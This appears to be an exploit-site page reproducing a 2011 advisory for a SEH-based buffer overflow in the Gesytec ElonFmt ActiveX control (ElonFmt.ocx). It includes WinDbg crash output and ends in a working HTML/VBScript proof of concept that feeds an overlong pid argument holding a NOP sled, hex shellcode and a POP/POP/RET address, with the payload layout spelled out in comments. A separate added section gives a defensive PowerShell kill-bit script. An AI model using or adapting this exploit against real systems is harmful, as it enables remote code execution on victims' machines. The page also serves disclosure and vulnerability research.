Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH) - exploit.company
vendor: Unknown
by: Unknown
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Unknown
Affected Version From: 1.1.14.1
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown

Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)

The ElonFmt ActiveX Control Module suffers from a buffer overflow vulnerability. When a large buffer is passed as the pid argument of the GetItem1 function in the elonfmt.ocx module, several registers are overwritten, including the SEH record. An attacker can gain access to the system on the affected node and execute arbitrary code.

Mitigation:

Unknown
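The advisory lists no mitigation. As an added example that is not part of the advisory or of Gesytec's software, the following PowerShell reports whether the ElonFmt control is registered on a host and whether its Internet Explorer kill bit is set, and can set the kill bit; it assumes the CLSID taken from the PoC's <object> tag and the standard ActiveX Compatibility registry locations (including the Wow6432Node view on 64-bit Windows).

```powershell
# Added example (not from the advisory): audit and kill-bit the ElonFmt control.
# CLSID from the PoC's <object> tag; registry paths are the standard IE locations.
$Clsid   = '{824C4DC5-8DA4-11D6-A01F-00E098177CDC}'
$KillBit = 0x400   # Compatibility Flags bit that blocks instantiation in IE

$RegPaths = @(
    "HKLM:\SOFTWARE\Classes\CLSID\$Clsid\InprocServer32",
    "HKLM:\SOFTWARE\Wow6432Node\Classes\CLSID\$Clsid\InprocServer32"
)
$CompatPaths = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
)

function Get-ElonFmtStatus {
    # Where is the OCX registered, and is the kill bit already present?
    $installed = foreach ($p in $RegPaths) {
        if (Test-Path $p) { (Get-ItemProperty -Path $p).'(default)' }
    }
    $killed = foreach ($p in $CompatPaths) {
        if (Test-Path $p) {
            $flags = (Get-ItemProperty -Path $p).'Compatibility Flags'
            if ($flags -and (([int]$flags) -band $KillBit)) { $p }
        }
    }
    [pscustomobject]@{
        Registered = [bool]$installed
        OcxPath    = ($installed -join '; ')
        KillBitSet = [bool]$killed
    }
}

function Set-ElonFmtKillBit {
    # Set the kill bit in every registry view that exists on this host,
    # preserving any other Compatibility Flags bits already present.
    foreach ($p in $CompatPaths) {
        if (-not (Test-Path (Split-Path $p -Parent))) { continue }   # view absent (32-bit OS)
        if (-not (Test-Path $p)) { New-Item -Path $p -Force | Out-Null }
        $existing = (Get-ItemProperty -Path $p -ErrorAction SilentlyContinue).'Compatibility Flags'
        $new = ([int]$existing) -bor $KillBit
        Set-ItemProperty -Path $p -Name 'Compatibility Flags' -Value $new -Type DWord
    }
}

Get-ElonFmtStatus   # run Set-ElonFmtKillBit from an elevated prompt to apply
```

The kill bit only stops Internet Explorer (and hosts that honour the ActiveX Compatibility list) from instantiating the control; other COM clients can still load the OCX, so it complements rather than replaces a vendor fix.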

Exploit-DB raw data:

<!--


Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)


Vendor: Gesytec GmbH
Product web page: http://www.gesytec.de
Affected version: 1.1.14.1

Summary: Connects LonWorks networks to process control, visualization, SCADA
and office software.

Desc: The ElonFmt ActiveX Control Module suffers from a buffer overflow
vulnerability. When a large buffer is sent to the pid item of the GetItem1
function in elonfmt.ocx module, we get a few memory registers overwritten
including the SEH. We're dealing with a character translation. An attacker
can gain access to the system on the affected node and execute arbitrary code.


----------------------------------------------------------------------------------

(fc.1608): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=cccccccc edx=7c9032bc esi=00000000 edi=00000000
eip=cccccccc esp=0013e7d8 ebp=0013e7f8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
cccccccc ??              ???
0:000> !exchain
0013e7ec: ntdll!ExecuteHandler2+3a (7c9032bc)
0013ecf0: cccccccc
Invalid exception stack at bbbbbbbb
0:000> u 0013ecf0
0013ecf0 bbbbbbbbcc      mov     ebx,0CCBBBBBBh
0013ecf5 cc              int     3
0013ecf6 cc              int     3
0013ecf7 cc              int     3
0013ecf8 dddd            fstp    st(5)
0013ecfa dddd            fstp    st(5)
0013ecfc dddd            fstp    st(5)
0013ecfe dddd            fstp    st(5)

...
...
...

0:000> d esp
0013eb58  01 00 00 00 8d 61 53 80-7c 5a 63 af 00 00 00 00  .....aS.|Zc.....
0013eb68  88 d5 2e ba 00 00 00 00-24 46 53 8a 00 86 8f bf  ........$FS.....
0013eb78  a8 5a 63 af a8 5a 63 af-fb 0a 80 bf 60 29 53 89  .Zc..Zc.....`)S.
0013eb88  ce 86 8f bf 68 d5 2e ba-88 d5 2e ba 00 00 00 00  ....h...........
0013eb98  06 00 05 00 a1 00 00 00-2e 0e 73 74 d1 18 43 7e  ..........st..C~
0013eba8  01 00 00 00 00 00 00 00-40 f7 47 00 81 18 c3 77  ........@.G....w
0013ebb8  1a 03 00 00 a2 56 00 10-00 ed 13 00 e8 eb 13 00  .....V..........
0013ebc8  20 8f 63 01 b8 8e 63 01-81 18 c3 77 01 00 00 00   .c...c....w....
0:000> d
0013ebd8  64 21 12 77 ff 00 00 00-74 e1 97 7c 51 7c 91 7c  d!.w....t..|Q|.|
0013ebe8  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ebf8  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec08  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec18  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec28  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec38  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec48  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................

...
...
...

0:000> d
0013ece8  aa aa aa aa aa aa aa aa-bb bb bb bb cc cc cc cc  ................
0013ecf8  dd dd dd dd dd dd dd dd-dd ad d0 01 01 00 63 01  ..............c.
0013ed08  00 00 00 00 b8 8e 63 01-01 00 00 00 00 ed 13 00  ......c.........
0013ed18  82 a5 00 10 8c ed 13 00-b8 8e 63 01 28 ee 13 00  ..........c.(...
0013ed28  00 00 00 00 80 02 63 01-80 ed 13 00 ae 43 dd 73  ......c......C.s
0013ed38  5c ed 13 00 d8 f0 00 10-02 00 00 00 d9 a3 00 10  \...............
0013ed48  80 02 63 01 24 8e 56 01-01 00 00 00 78 8e 63 01  ..c.$.V.....x.c.
0013ed58  48 ed 13 00 80 ed 13 00-98 f0 00 10 01 00 00 00  H...............



----------------------------------------------------------------------------------


Tested on: Microsoft Windows XP Professional SP3 (EN)
           Easylon OPC Server M 2.30.66.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
                            Zero Science Lab - http://www.zeroscience.mk

High five to sickn3ss!


Advisory ID: ZSL-2011-5011
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5011.php


09.04.2011


JUST A PoC MODEL:


-->



<html>
<object classid='clsid:824C4DC5-8DA4-11D6-A01F-00E098177CDC' id='zsl' />
<script language='VBScript'>

targetFile = "C:\Easylon\Shared\ElonFmt.ocx"
prototype  = "Function GetItem1 ( ByVal typeName As String ,  ByVal pid As String ,  ByVal selector As Integer ) As Object"
memberName = "GetItem1"
progid     = "ELONFMTLib.ElonFmt"
argCount   = 3

arg1="defaultV"

arg2 = String(10, "90") _
     + "2bc9b88bc18865b132ddc3d97424f45d31450e03" _
     + "450e834ec56a90ac2ee35b4caf94d2a99e8681ba" _
     + "b316c1ee3fdc871acb900f2d7c1e76007daeb6ce" _
     + "bdb04a0c921272dfe753b33d07016c4abab6190e" _
     + "07b6cd0537c068d9cc7a72097cf03cb1f65e9dc0" _
     + "dbbce18b5076910ab1465a3dfd0565f2f054a134" _
     + "eb22d94796341a3a4cb0bf9c0762641dcbf5ef11" _
     + "a072b7353756c341bc5904c0867d80895d1f9177" _
     + "3320c1dfec8489cdf9bfd39bfc326ee2ff4c7144" _
     + "687cfa0bef8129681fc870d88895e059d525df9d" _
     + "e0a5ea5d17b59e5853717210cc147487ed3c1746" _
     + "7edcd8" _
     + String(62, "A") + "eb069090" + "78c70110" _
     + "e9e0fdffff" + String(20, "D")

arg3=1

zsl.GetItem1 arg1 ,arg2 ,arg3



'
'Argument No.2 Structure:
'--------------------------------------------------------------------------------------------------------------
'
' (20)NOPSLED + (446)SCODE(calc) + (62)JUNK + (8)JMP + (8)P/P/R EDI LDRF32R.dll + (10)JMP BCk + (20)JUNK
'
'--------------------------------------------------------------------------------------------------------------
'
'
'
'Scenes (2/5)
'--------------------------------------------------------------------------------------------------------------
'
'arg2 = String(528, "A") + "BBBBBBBB" + "CCCCCCCC" + "DDDDDDDD" + "41414141"
'
'           junk             nseh        seh(eip)        pad         eip
'
'--------------------------------------------------------------------------------------------------------------
'
'arg2 = String(528, "A") + "BBBBBBBB" + "CCCCCCCC" + String(101, "D")
'
'           junk             nseh        seh(eip)         random
'
'--------------------------------------------------------------------------------------------------------------
'


</script>
</html>